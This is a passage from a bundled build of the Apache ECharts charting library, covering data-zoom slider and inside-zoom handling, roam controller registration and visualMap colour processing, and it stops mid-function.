Text({\n                silent: true,\n                invisible: true,\n                style: {\n                    x: 0, y: 0, text: '',\n                    textVerticalAlign: 'middle',\n                    textAlign: 'center',\n                    textFill: textStyleModel.getTextColor(),\n                    textFont: textStyleModel.getFont()\n                },\n                z2: 10\n            }));\n\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _resetInterval: function () {\n        var range = this._range = this.dataZoomModel.getPercentRange();\n        var viewExtent = this._getViewExtent();\n\n        this._handleEnds = [\n            linearMap$1(range[0], [0, 100], viewExtent, true),\n            linearMap$1(range[1], [0, 100], viewExtent, true)\n        ];\n    },\n\n    /**\n     * @private\n     * @param {(number|string)} handleIndex 0 or 1 or 'all'\n     * @param {number} delta\n     * @return {boolean} changed\n     */\n    _updateInterval: function (handleIndex, delta) {\n        var dataZoomModel = this.dataZoomModel;\n        var handleEnds = this._handleEnds;\n        var viewExtend = this._getViewExtent();\n        var minMaxSpan = dataZoomModel.findRepresentativeAxisProxy().getMinMaxSpan();\n        var percentExtent = [0, 100];\n\n        sliderMove(\n            delta,\n            handleEnds,\n            viewExtend,\n            dataZoomModel.get('zoomLock') ? 'all' : handleIndex,\n            minMaxSpan.minSpan != null\n                ? linearMap$1(minMaxSpan.minSpan, percentExtent, viewExtend, true) : null,\n            minMaxSpan.maxSpan != null\n                ? linearMap$1(minMaxSpan.maxSpan, percentExtent, viewExtend, true) : null\n        );\n\n        var lastRange = this._range;\n        var range = this._range = asc$2([\n            linearMap$1(handleEnds[0], viewExtend, percentExtent, true),\n            linearMap$1(handleEnds[1], viewExtend, percentExtent, true)\n        ]);\n\n        return !lastRange || lastRange[0] !== range[0] || lastRange[1] !== range[1];\n    },\n\n    /**\n     * @private\n     */\n    _updateView: function (nonRealtime) {\n        var displaybles = this._displayables;\n        var handleEnds = this._handleEnds;\n        var handleInterval = asc$2(handleEnds.slice());\n        var size = this._size;\n\n        each$26([0, 1], function (handleIndex) {\n            // Handles\n            var handle = displaybles.handles[handleIndex];\n            var handleHeight = this._handleHeight;\n            handle.attr({\n                scale: [handleHeight / 2, handleHeight / 2],\n                position: [handleEnds[handleIndex], size[1] / 2 - handleHeight / 2]\n            });\n        }, this);\n\n        // Filler\n        displaybles.filler.setShape({\n            x: handleInterval[0],\n            y: 0,\n            width: handleInterval[1] - handleInterval[0],\n            height: size[1]\n        });\n\n        this._updateDataInfo(nonRealtime);\n    },\n\n    /**\n     * @private\n     */\n    _updateDataInfo: function (nonRealtime) {\n        var dataZoomModel = this.dataZoomModel;\n        var displaybles = this._displayables;\n        var handleLabels = displaybles.handleLabels;\n        var orient = this._orient;\n        var labelTexts = ['', ''];\n\n        // FIXME\n        // date型，支持formatter，autoformatter（ec2 date.getAutoFormatter）\n        if (dataZoomModel.get('showDetail')) {\n            var axisProxy = dataZoomModel.findRepresentativeAxisProxy();\n\n            if (axisProxy) {\n                var axis = axisProxy.getAxisModel().axis;\n                var range = this._range;\n\n                var dataInterval = nonRealtime\n                    // See #4434, data and axis are not processed and reset yet in non-realtime mode.\n                    ? axisProxy.calculateDataWindow({\n                        start: range[0], end: range[1]\n                    }).valueWindow\n                    : axisProxy.getDataValueWindow();\n\n                labelTexts = [\n                    this._formatLabel(dataInterval[0], axis),\n                    this._formatLabel(dataInterval[1], axis)\n                ];\n            }\n        }\n\n        var orderedHandleEnds = asc$2(this._handleEnds.slice());\n\n        setLabel.call(this, 0);\n        setLabel.call(this, 1);\n\n        function setLabel(handleIndex) {\n            // Label\n            // Text should not transform by barGroup.\n            // Ignore handlers transform\n            var barTransform = getTransform(\n                displaybles.handles[handleIndex].parent, this.group\n            );\n            var direction = transformDirection(\n                handleIndex === 0 ? 'right' : 'left', barTransform\n            );\n            var offset = this._handleWidth / 2 + LABEL_GAP;\n            var textPoint = applyTransform$1(\n                [\n                    orderedHandleEnds[handleIndex] + (handleIndex === 0 ? -offset : offset),\n                    this._size[1] / 2\n                ],\n                barTransform\n            );\n            handleLabels[handleIndex].setStyle({\n                x: textPoint[0],\n                y: textPoint[1],\n                textVerticalAlign: orient === HORIZONTAL ? 'middle' : direction,\n                textAlign: orient === HORIZONTAL ? direction : 'center',\n                text: labelTexts[handleIndex]\n            });\n        }\n    },\n\n    /**\n     * @private\n     */\n    _formatLabel: function (value, axis) {\n        var dataZoomModel = this.dataZoomModel;\n        var labelFormatter = dataZoomModel.get('labelFormatter');\n\n        var labelPrecision = dataZoomModel.get('labelPrecision');\n        if (labelPrecision == null || labelPrecision === 'auto') {\n            labelPrecision = axis.getPixelPrecision();\n        }\n\n        var valueStr = (value == null || isNaN(value))\n            ? ''\n            // FIXME Glue code\n            : (axis.type === 'category' || axis.type === 'time')\n                ? axis.scale.getLabel(Math.round(value))\n                // param of toFixed should less then 20.\n                : value.toFixed(Math.min(labelPrecision, 20));\n\n        return isFunction$1(labelFormatter)\n            ? labelFormatter(value, valueStr)\n            : isString(labelFormatter)\n            ? labelFormatter.replace('{value}', valueStr)\n            : valueStr;\n    },\n\n    /**\n     * @private\n     * @param {boolean} showOrHide true: show, false: hide\n     */\n    _showDataInfo: function (showOrHide) {\n        // Always show when drgging.\n        showOrHide = this._dragging || showOrHide;\n\n        var handleLabels = this._displayables.handleLabels;\n        handleLabels[0].attr('invisible', !showOrHide);\n        handleLabels[1].attr('invisible', !showOrHide);\n    },\n\n    _onDragMove: function (handleIndex, dx, dy, event) {\n        this._dragging = true;\n\n        // For mobile device, prevent screen slider on the button.\n        stop(event.event);\n\n        // Transform dx, dy to bar coordination.\n        var barTransform = this._displayables.barGroup.getLocalTransform();\n        var vertex = applyTransform$1([dx, dy], barTransform, true);\n\n        var changed = this._updateInterval(handleIndex, vertex[0]);\n\n        var realtime = this.dataZoomModel.get('realtime');\n\n        this._updateView(!realtime);\n\n        // Avoid dispatch dataZoom repeatly but range not changed,\n        // which cause bad visual effect when progressive enabled.\n        changed && realtime && this._dispatchZoomAction();\n    },\n\n    _onDragEnd: function () {\n        this._dragging = false;\n        this._showDataInfo(false);\n\n        // While in realtime mode and stream mode, dispatch action when\n        // drag end will cause the whole view rerender, which is unnecessary.\n        var realtime = this.dataZoomModel.get('realtime');\n        !realtime && this._dispatchZoomAction();\n    },\n\n    _onClickPanelClick: function (e) {\n        var size = this._size;\n        var localPoint = this._displayables.barGroup.transformCoordToLocal(e.offsetX, e.offsetY);\n\n        if (localPoint[0] < 0 || localPoint[0] > size[0]\n            || localPoint[1] < 0 || localPoint[1] > size[1]\n        ) {\n            return;\n        }\n\n        var handleEnds = this._handleEnds;\n        var center = (handleEnds[0] + handleEnds[1]) / 2;\n\n        var changed = this._updateInterval('all', localPoint[0] - center);\n        this._updateView();\n        changed && this._dispatchZoomAction();\n    },\n\n    /**\n     * This action will be throttled.\n     * @private\n     */\n    _dispatchZoomAction: function () {\n        var range = this._range;\n\n        this.api.dispatchAction({\n            type: 'dataZoom',\n            from: this.uid,\n            dataZoomId: this.dataZoomModel.id,\n            start: range[0],\n            end: range[1]\n        });\n    },\n\n    /**\n     * @private\n     */\n    _findCoordRect: function () {\n        // Find the grid coresponding to the first axis referred by dataZoom.\n        var rect;\n        each$26(this.getTargetCoordInfo(), function (coordInfoList) {\n            if (!rect && coordInfoList.length) {\n                var coordSys = coordInfoList[0].model.coordinateSystem;\n                rect = coordSys.getRect && coordSys.getRect();\n            }\n        });\n        if (!rect) {\n            var width = this.api.getWidth();\n            var height = this.api.getHeight();\n            rect = {\n                x: width * 0.2,\n                y: height * 0.2,\n                width: width * 0.6,\n                height: height * 0.6\n            };\n        }\n\n        return rect;\n    }\n\n});\n\nfunction getOtherDim(thisDim) {\n    // FIXME\n    // 这个逻辑和getOtherAxis里一致，但是写在这里是否不好\n    var map$$1 = {x: 'y', y: 'x', radius: 'angle', angle: 'radius'};\n    return map$$1[thisDim];\n}\n\nfunction getCursor(orient) {\n    return orient === 'vertical' ? 'ns-resize' : 'ew-resize';\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nDataZoomModel.extend({\n\n    type: 'dataZoom.inside',\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        disabled: false,   // Whether disable this inside zoom.\n        zoomLock: false,   // Whether disable zoom but only pan.\n        zoomOnMouseWheel: true, // Can be: true / false / 'shift' / 'ctrl' / 'alt'.\n        moveOnMouseMove: true,   // Can be: true / false / 'shift' / 'ctrl' / 'alt'.\n        moveOnMouseWheel: false, // Can be: true / false / 'shift' / 'ctrl' / 'alt'.\n        preventDefaultMouseMove: true\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Only create one roam controller for each coordinate system.\n// one roam controller might be refered by two inside data zoom\n// components (for example, one for x and one for y). When user\n// pan or zoom, only dispatch one action for those data zoom\n// components.\n\nvar ATTR$2 = '\\0_ec_dataZoom_roams';\n\n\n/**\n * @public\n * @param {module:echarts/ExtensionAPI} api\n * @param {Object} dataZoomInfo\n * @param {string} dataZoomInfo.coordId\n * @param {Function} dataZoomInfo.containsPoint\n * @param {Array.<string>} dataZoomInfo.allCoordIds\n * @param {string} dataZoomInfo.dataZoomId\n * @param {Object} dataZoomInfo.getRange\n * @param {Function} dataZoomInfo.getRange.pan\n * @param {Function} dataZoomInfo.getRange.zoom\n * @param {Function} dataZoomInfo.getRange.scrollMove\n * @param {boolean} dataZoomInfo.dataZoomModel\n */\nfunction register$2(api, dataZoomInfo) {\n    var store = giveStore$1(api);\n    var theDataZoomId = dataZoomInfo.dataZoomId;\n    var theCoordId = dataZoomInfo.coordId;\n\n    // Do clean when a dataZoom changes its target coordnate system.\n    // Avoid memory leak, dispose all not-used-registered.\n    each$1(store, function (record, coordId) {\n        var dataZoomInfos = record.dataZoomInfos;\n        if (dataZoomInfos[theDataZoomId]\n            && indexOf(dataZoomInfo.allCoordIds, theCoordId) < 0\n        ) {\n            delete dataZoomInfos[theDataZoomId];\n            record.count--;\n        }\n    });\n\n    cleanStore(store);\n\n    var record = store[theCoordId];\n    // Create if needed.\n    if (!record) {\n        record = store[theCoordId] = {\n            coordId: theCoordId,\n            dataZoomInfos: {},\n            count: 0\n        };\n        record.controller = createController(api, record);\n        record.dispatchAction = curry(dispatchAction$1, api);\n    }\n\n    // Update reference of dataZoom.\n    !(record.dataZoomInfos[theDataZoomId]) && record.count++;\n    record.dataZoomInfos[theDataZoomId] = dataZoomInfo;\n\n    var controllerParams = mergeControllerParams(record.dataZoomInfos);\n    record.controller.enable(controllerParams.controlType, controllerParams.opt);\n\n    // Consider resize, area should be always updated.\n    record.controller.setPointerChecker(dataZoomInfo.containsPoint);\n\n    // Update throttle.\n    createOrUpdate(\n        record,\n        'dispatchAction',\n        dataZoomInfo.dataZoomModel.get('throttle', true),\n        'fixRate'\n    );\n}\n\n/**\n * @public\n * @param {module:echarts/ExtensionAPI} api\n * @param {string} dataZoomId\n */\nfunction unregister$1(api, dataZoomId) {\n    var store = giveStore$1(api);\n\n    each$1(store, function (record) {\n        record.controller.dispose();\n        var dataZoomInfos = record.dataZoomInfos;\n        if (dataZoomInfos[dataZoomId]) {\n            delete dataZoomInfos[dataZoomId];\n            record.count--;\n        }\n    });\n\n    cleanStore(store);\n}\n\n/**\n * @public\n */\nfunction generateCoordId(coordModel) {\n    return coordModel.type + '\\0_' + coordModel.id;\n}\n\n/**\n * Key: coordId, value: {dataZoomInfos: [], count, controller}\n * @type {Array.<Object>}\n */\nfunction giveStore$1(api) {\n    // Mount store on zrender instance, so that we do not\n    // need to worry about dispose.\n    var zr = api.getZr();\n    return zr[ATTR$2] || (zr[ATTR$2] = {});\n}\n\nfunction createController(api, newRecord) {\n    var controller = new RoamController(api.getZr());\n\n    each$1(['pan', 'zoom', 'scrollMove'], function (eventName) {\n        controller.on(eventName, function (event) {\n            var batch = [];\n\n            each$1(newRecord.dataZoomInfos, function (info) {\n                // Check whether the behaviors (zoomOnMouseWheel, moveOnMouseMove,\n                // moveOnMouseWheel, ...) enabled.\n                if (!event.isAvailableBehavior(info.dataZoomModel.option)) {\n                    return;\n                }\n\n                var method = (info.getRange || {})[eventName];\n                var range = method && method(newRecord.controller, event);\n\n                !info.dataZoomModel.get('disabled', true) && range && batch.push({\n                    dataZoomId: info.dataZoomId,\n                    start: range[0],\n                    end: range[1]\n                });\n            });\n\n            batch.length && newRecord.dispatchAction(batch);\n        });\n    });\n\n    return controller;\n}\n\nfunction cleanStore(store) {\n    each$1(store, function (record, coordId) {\n        if (!record.count) {\n            record.controller.dispose();\n            delete store[coordId];\n        }\n    });\n}\n\n/**\n * This action will be throttled.\n */\nfunction dispatchAction$1(api, batch) {\n    api.dispatchAction({\n        type: 'dataZoom',\n        batch: batch\n    });\n}\n\n/**\n * Merge roamController settings when multiple dataZooms share one roamController.\n */\nfunction mergeControllerParams(dataZoomInfos) {\n    var controlType;\n    // DO NOT use reserved word (true, false, undefined) as key literally. Even if encapsulated\n    // as string, it is probably revert to reserved word by compress tool. See #7411.\n    var prefix = 'type_';\n    var typePriority = {\n        'type_true': 2,\n        'type_move': 1,\n        'type_false': 0,\n        'type_undefined': -1\n    };\n    var preventDefaultMouseMove = true;\n\n    each$1(dataZoomInfos, function (dataZoomInfo) {\n        var dataZoomModel = dataZoomInfo.dataZoomModel;\n        var oneType = dataZoomModel.get('disabled', true)\n            ? false\n            : dataZoomModel.get('zoomLock', true)\n            ? 'move'\n            : true;\n        if (typePriority[prefix + oneType] > typePriority[prefix + controlType]) {\n            controlType = oneType;\n        }\n\n        // Prevent default move event by default. If one false, do not prevent. Otherwise\n        // users may be confused why it does not work when multiple insideZooms exist.\n        preventDefaultMouseMove &= dataZoomModel.get('preventDefaultMouseMove', true);\n    });\n\n    return {\n        controlType: controlType,\n        opt: {\n            // RoamController will enable all of these functionalities,\n            // and the final behavior is determined by its event listener\n            // provided by each inside zoom.\n            zoomOnMouseWheel: true,\n            moveOnMouseMove: true,\n            moveOnMouseWheel: true,\n            preventDefaultMouseMove: !!preventDefaultMouseMove\n        }\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar bind$6 = bind;\n\nvar InsideZoomView = DataZoomView.extend({\n\n    type: 'dataZoom.inside',\n\n    /**\n     * @override\n     */\n    init: function (ecModel, api) {\n        /**\n         * 'throttle' is used in this.dispatchAction, so we save range\n         * to avoid missing some 'pan' info.\n         * @private\n         * @type {Array.<number>}\n         */\n        this._range;\n    },\n\n    /**\n     * @override\n     */\n    render: function (dataZoomModel, ecModel, api, payload) {\n        InsideZoomView.superApply(this, 'render', arguments);\n\n        // Hence the `throttle` util ensures to preserve command order,\n        // here simply updating range all the time will not cause missing\n        // any of the the roam change.\n        this._range = dataZoomModel.getPercentRange();\n\n        // Reset controllers.\n        each$1(this.getTargetCoordInfo(), function (coordInfoList, coordSysName) {\n\n            var allCoordIds = map(coordInfoList, function (coordInfo) {\n                return generateCoordId(coordInfo.model);\n            });\n\n            each$1(coordInfoList, function (coordInfo) {\n                var coordModel = coordInfo.model;\n\n                var getRange = {};\n                each$1(['pan', 'zoom', 'scrollMove'], function (eventName) {\n                    getRange[eventName] = bind$6(roamHandlers[eventName], this, coordInfo, coordSysName);\n                }, this);\n\n                register$2(\n                    api,\n                    {\n                        coordId: generateCoordId(coordModel),\n                        allCoordIds: allCoordIds,\n                        containsPoint: function (e, x, y) {\n                            return coordModel.coordinateSystem.containPoint([x, y]);\n                        },\n                        dataZoomId: dataZoomModel.id,\n                        dataZoomModel: dataZoomModel,\n                        getRange: getRange\n                    }\n                );\n            }, this);\n\n        }, this);\n    },\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        unregister$1(this.api, this.dataZoomModel.id);\n        InsideZoomView.superApply(this, 'dispose', arguments);\n        this._range = null;\n    }\n\n});\n\nvar roamHandlers = {\n\n    /**\n     * @this {module:echarts/component/dataZoom/InsideZoomView}\n     */\n    zoom: function (coordInfo, coordSysName, controller, e) {\n        var lastRange = this._range;\n        var range = lastRange.slice();\n\n        // Calculate transform by the first axis.\n        var axisModel = coordInfo.axisModels[0];\n        if (!axisModel) {\n            return;\n        }\n\n        var directionInfo = getDirectionInfo[coordSysName](\n            null, [e.originX, e.originY], axisModel, controller, coordInfo\n        );\n        var percentPoint = (\n            directionInfo.signal > 0\n                ? (directionInfo.pixelStart + directionInfo.pixelLength - directionInfo.pixel)\n                : (directionInfo.pixel - directionInfo.pixelStart)\n            ) / directionInfo.pixelLength * (range[1] - range[0]) + range[0];\n\n        var scale = Math.max(1 / e.scale, 0);\n        range[0] = (range[0] - percentPoint) * scale + percentPoint;\n        range[1] = (range[1] - percentPoint) * scale + percentPoint;\n\n        // Restrict range.\n        var minMaxSpan = this.dataZoomModel.findRepresentativeAxisProxy().getMinMaxSpan();\n\n        sliderMove(0, range, [0, 100], 0, minMaxSpan.minSpan, minMaxSpan.maxSpan);\n\n        this._range = range;\n\n        if (lastRange[0] !== range[0] || lastRange[1] !== range[1]) {\n            return range;\n        }\n    },\n\n    /**\n     * @this {module:echarts/component/dataZoom/InsideZoomView}\n     */\n    pan: makeMover(function (range, axisModel, coordInfo, coordSysName, controller, e) {\n        var directionInfo = getDirectionInfo[coordSysName](\n            [e.oldX, e.oldY], [e.newX, e.newY], axisModel, controller, coordInfo\n        );\n\n        return directionInfo.signal\n            * (range[1] - range[0])\n            * directionInfo.pixel / directionInfo.pixelLength;\n    }),\n\n    /**\n     * @this {module:echarts/component/dataZoom/InsideZoomView}\n     */\n    scrollMove: makeMover(function (range, axisModel, coordInfo, coordSysName, controller, e) {\n        var directionInfo = getDirectionInfo[coordSysName](\n            [0, 0], [e.scrollDelta, e.scrollDelta], axisModel, controller, coordInfo\n        );\n        return directionInfo.signal * (range[1] - range[0]) * e.scrollDelta;\n    })\n};\n\nfunction makeMover(getPercentDelta) {\n    return function (coordInfo, coordSysName, controller, e) {\n        var lastRange = this._range;\n        var range = lastRange.slice();\n\n        // Calculate transform by the first axis.\n        var axisModel = coordInfo.axisModels[0];\n        if (!axisModel) {\n            return;\n        }\n\n        var percentDelta = getPercentDelta(\n            range, axisModel, coordInfo, coordSysName, controller, e\n        );\n\n        sliderMove(percentDelta, range, [0, 100], 'all');\n\n        this._range = range;\n\n        if (lastRange[0] !== range[0] || lastRange[1] !== range[1]) {\n            return range;\n        }\n    };\n}\n\nvar getDirectionInfo = {\n\n    grid: function (oldPoint, newPoint, axisModel, controller, coordInfo) {\n        var axis = axisModel.axis;\n        var ret = {};\n        var rect = coordInfo.model.coordinateSystem.getRect();\n        oldPoint = oldPoint || [0, 0];\n\n        if (axis.dim === 'x') {\n            ret.pixel = newPoint[0] - oldPoint[0];\n            ret.pixelLength = rect.width;\n            ret.pixelStart = rect.x;\n            ret.signal = axis.inverse ? 1 : -1;\n        }\n        else { // axis.dim === 'y'\n            ret.pixel = newPoint[1] - oldPoint[1];\n            ret.pixelLength = rect.height;\n            ret.pixelStart = rect.y;\n            ret.signal = axis.inverse ? -1 : 1;\n        }\n\n        return ret;\n    },\n\n    polar: function (oldPoint, newPoint, axisModel, controller, coordInfo) {\n        var axis = axisModel.axis;\n        var ret = {};\n        var polar = coordInfo.model.coordinateSystem;\n        var radiusExtent = polar.getRadiusAxis().getExtent();\n        var angleExtent = polar.getAngleAxis().getExtent();\n\n        oldPoint = oldPoint ? polar.pointToCoord(oldPoint) : [0, 0];\n        newPoint = polar.pointToCoord(newPoint);\n\n        if (axisModel.mainType === 'radiusAxis') {\n            ret.pixel = newPoint[0] - oldPoint[0];\n            // ret.pixelLength = Math.abs(radiusExtent[1] - radiusExtent[0]);\n            // ret.pixelStart = Math.min(radiusExtent[0], radiusExtent[1]);\n            ret.pixelLength = radiusExtent[1] - radiusExtent[0];\n            ret.pixelStart = radiusExtent[0];\n            ret.signal = axis.inverse ? 1 : -1;\n        }\n        else { // 'angleAxis'\n            ret.pixel = newPoint[1] - oldPoint[1];\n            // ret.pixelLength = Math.abs(angleExtent[1] - angleExtent[0]);\n            // ret.pixelStart = Math.min(angleExtent[0], angleExtent[1]);\n            ret.pixelLength = angleExtent[1] - angleExtent[0];\n            ret.pixelStart = angleExtent[0];\n            ret.signal = axis.inverse ? -1 : 1;\n        }\n\n        return ret;\n    },\n\n    singleAxis: function (oldPoint, newPoint, axisModel, controller, coordInfo) {\n        var axis = axisModel.axis;\n        var rect = coordInfo.model.coordinateSystem.getRect();\n        var ret = {};\n\n        oldPoint = oldPoint || [0, 0];\n\n        if (axis.orient === 'horizontal') {\n            ret.pixel = newPoint[0] - oldPoint[0];\n            ret.pixelLength = rect.width;\n            ret.pixelStart = rect.x;\n            ret.signal = axis.inverse ? 1 : -1;\n        }\n        else { // 'vertical'\n            ret.pixel = newPoint[1] - oldPoint[1];\n            ret.pixelLength = rect.height;\n            ret.pixelStart = rect.y;\n            ret.signal = axis.inverse ? -1 : 1;\n        }\n\n        return ret;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n\n// Do not include './dataZoomSelect',\n// since it only work for toolbox dataZoom.\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$27 = each$1;\n\nvar preprocessor$3 = function (option) {\n    var visualMap = option && option.visualMap;\n\n    if (!isArray(visualMap)) {\n        visualMap = visualMap ? [visualMap] : [];\n    }\n\n    each$27(visualMap, function (opt) {\n        if (!opt) {\n            return;\n        }\n\n        // rename splitList to pieces\n        if (has$2(opt, 'splitList') && !has$2(opt, 'pieces')) {\n            opt.pieces = opt.splitList;\n            delete opt.splitList;\n        }\n\n        var pieces = opt.pieces;\n        if (pieces && isArray(pieces)) {\n            each$27(pieces, function (piece) {\n                if (isObject$1(piece)) {\n                    if (has$2(piece, 'start') && !has$2(piece, 'min')) {\n                        piece.min = piece.start;\n                    }\n                    if (has$2(piece, 'end') && !has$2(piece, 'max')) {\n                        piece.max = piece.end;\n                    }\n                }\n            });\n        }\n    });\n};\n\nfunction has$2(obj, name) {\n    return obj && obj.hasOwnProperty && obj.hasOwnProperty(name);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nComponentModel.registerSubTypeDefaulter('visualMap', function (option) {\n    // Compatible with ec2, when splitNumber === 0, continuous visualMap will be used.\n    return (\n            !option.categories\n            && (\n                !(\n                    option.pieces\n                        ? option.pieces.length > 0\n                        : option.splitNumber > 0\n                )\n                || option.calculable\n            )\n        )\n        ? 'continuous' : 'piecewise';\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar VISUAL_PRIORITY = PRIORITY.VISUAL.COMPONENT;\n\nregisterVisual(VISUAL_PRIORITY, {\n    createOnAllSeries: true,\n    reset: function (seriesModel, ecModel) {\n        var resetDefines = [];\n        ecModel.eachComponent('visualMap', function (visualMapModel) {\n            var pipelineContext = seriesModel.pipelineContext;\n            if (!visualMapModel.isTargetSeries(seriesModel)\n                || (pipelineContext && pipelineContext.large)\n            ) {\n                return;\n            }\n\n            resetDefines.push(incrementalApplyVisual(\n                visualMapModel.stateList,\n                visualMapModel.targetVisuals,\n                bind(visualMapModel.getValueState, visualMapModel),\n                visualMapModel.getDataDimension(seriesModel.getData())\n            ));\n        });\n\n        return resetDefines;\n    }\n});\n\n// Only support color.\nregisterVisual(VISUAL_PRIORITY, {\n    createOnAllSeries: true,\n    reset: function (seriesModel, ecModel) {\n        var data = seriesModel.getData();\n        var visualMetaList = [];\n\n        ecModel.eachComponent('visualMap', function (visualMapModel) {\n            if (visualMapModel.isTargetSeries(seriesModel)) {\n                var visualMeta = visualMapModel.getVisualMeta(\n                    bind(getColorVisual, null, seriesModel, visualMapModel)\n                ) || {stops: [], outerColors: []};\n\n                var concreteDim = visualMapModel.getDataDimension(data);\n                var dimInfo = data.getDimensionInfo(concreteDim);\n                if (dimInfo != null) {\n                    // visualMeta.dimension should be dimension index, but not concrete dimension.\n                    visualMeta.dimension = dimInfo.index;\n                    visualMetaList.push(visualMeta);\n                }\n            }\n        });\n\n        // console.log(JSON.stringify(visualMetaList.map(a => a.stops)));\n        seriesModel.getData().setVisual('visualMeta', visualMetaList);\n    }\n});\n\n// FIXME\n// performance and export for heatmap?\n// value can be Infinity or -Infinity\nfunction getColorVisual(seriesModel, visualMapModel, value, valueState) {\n    var mappings = visualMapModel.targetVisuals[valueState];\n    var visualTypes = VisualMapping.prepareVisualTypes(mappings);\n    var resultVisual = {\n        color: seriesModel.getData().getVisual('color') // default color.\n    };\n\n    for (var i = 0, len = visualTypes.length; i < len; i++) {\n        var type = visualTypes[i];\n        var mapping = mappings[\n            type === 'opacity' ? '__alphaForOpacity' : type\n        ];\n        mapping && mapping.applyVisual(value, getVisual, setVisual);\n    }\n\n    return resultVisual.color;\n\n    function getVisual(key) {\n        return resultVisual[key];\n    }\n\n    function 